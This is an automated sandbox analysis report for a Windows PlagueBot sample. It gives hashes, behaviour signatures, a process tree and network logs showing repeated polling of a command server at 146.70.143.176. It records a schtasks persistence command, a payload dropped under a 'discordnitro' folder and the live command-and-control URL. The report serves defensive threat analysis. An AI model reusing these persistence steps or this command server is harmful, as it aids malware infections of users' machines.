Analysis

  • max time kernel
    109s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-10-2022 06:02

General

  • Target

    b03ccade490854df220914c4430967e2.exe

  • Size

    967KB

  • MD5

    b03ccade490854df220914c4430967e2

  • SHA1

    1911a59e8c4b427d3fbc8fc9c794886bd2d81305

  • SHA256

    81cb1fa3507209f360261e795cc68622c4163cbb0c6082dc7d8358a04492f961

  • SHA512

    0c05ff99f2d2f448c431073b9a339e6dc1ccab43c9442be44edfd493c3d4d9bd604a0deb792b91295571817113c309bafc6d230b470a4874493561bd5aa9bc36

  • SSDEEP

    24576:xNxsglIPAtgV+rnEQBg2AdqgwGd9OCPltP0gxkR3dCqJO5VxQ75Sf1:57uKrnEQi2Ad/wQPLP0gx1qt5Sf1

Score
10/10

Malware Config

Signatures

  • PlagueBot

    PlagueBot is an open source Bot written in Pascal.

  • PlagueBot Executable 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b03ccade490854df220914c4430967e2.exe
    "C:\Users\Admin\AppData\Local\Temp\b03ccade490854df220914c4430967e2.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4656
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /Create /TN "WinManager" /XML "C:\Users\Admin\AppData\Local\Temp\NewTask.xml"
      2⤵
      • Creates scheduled task(s)
      PID:1164
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /Query /FO "LIST" /TN "WinManager"
      2⤵
        PID:5036
      • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
        "C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe" /wait
        2⤵
        • Executes dropped EXE
        PID:2912
    • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
      C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
      1⤵
      • Executes dropped EXE
      PID:4560
    • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
      C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
      1⤵
      • Executes dropped EXE
      PID:816

    Network

    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:19 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:24 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:29 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:34 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:40 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=96
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:45 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=95
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:50 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=94
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:02:55 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=93
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:00 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=92
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:05 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=91
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:11 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=90
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:16 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=89
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:21 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=88
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:26 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=87
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:31 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=86
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:36 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=85
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:41 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=84
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:47 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=83
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-ro
      GET
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      winmgr.exe
      Remote address:
      146.70.143.176:80
      Request
      GET /commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD HTTP/1.1
      Connection: keep-alive
      Host: 146.70.143.176
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Oct 2022 06:03:52 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
      X-Powered-By: PHP/7.4.29
      Content-Length: 40
      Keep-Alive: timeout=5, max=82
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • 146.70.143.176:80
      http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD
      http
      winmgr.exe
      6.3kB
      6.5kB
      40
      22

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200

      HTTP Request

      GET http://146.70.143.176/commands.php?GUID=4CFB5922-B036-4C14-9ED1-03C0DAD19FBD

      HTTP Response

      200
    • 93.184.221.240:80
      322 B
      7
    • 104.80.225.205:443
      322 B
      7
    • 51.132.193.104:443
      322 B
      7
    • 93.184.221.240:80
      322 B
      7
    • 93.184.221.240:80
      322 B
      7
    • 93.184.221.240:80
      322 B
      7
    No results found

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\NewTask.xml

      Filesize

      1KB

      MD5

      76cdea2a5eb493f5a69b6d4ec0d6c6a5

      SHA1

      822eb372a69c75d593b12ca6af0ebdecb4ca643d

      SHA256

      472b9a23f16e583189b50e59fc219ed06488b3be38f116bd02c54b34f88ce5a6

      SHA512

      19df57937d0b250b38c076c8b55f03a76252d90c5936f3ac416843a46a9ff5edeaad2a295bd9f06e1740d7fc2427f3a58092113618db03658601ad0398b834e8

    • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe

      Filesize

      967KB

      MD5

      b63bb68654e7be72058398809d6c4754

      SHA1

      4a7b43488029a2d4c960c9ee4431b99c8640a4b0

      SHA256

      8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

      SHA512

      c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

    • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe

      Filesize

      967KB

      MD5

      b63bb68654e7be72058398809d6c4754

      SHA1

      4a7b43488029a2d4c960c9ee4431b99c8640a4b0

      SHA256

      8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

      SHA512

      c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

    • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe

      Filesize

      967KB

      MD5

      b63bb68654e7be72058398809d6c4754

      SHA1

      4a7b43488029a2d4c960c9ee4431b99c8640a4b0

      SHA256

      8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

      SHA512

      c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

    • C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe

      Filesize

      967KB

      MD5

      b63bb68654e7be72058398809d6c4754

      SHA1

      4a7b43488029a2d4c960c9ee4431b99c8640a4b0

      SHA256

      8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

      SHA512

      c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.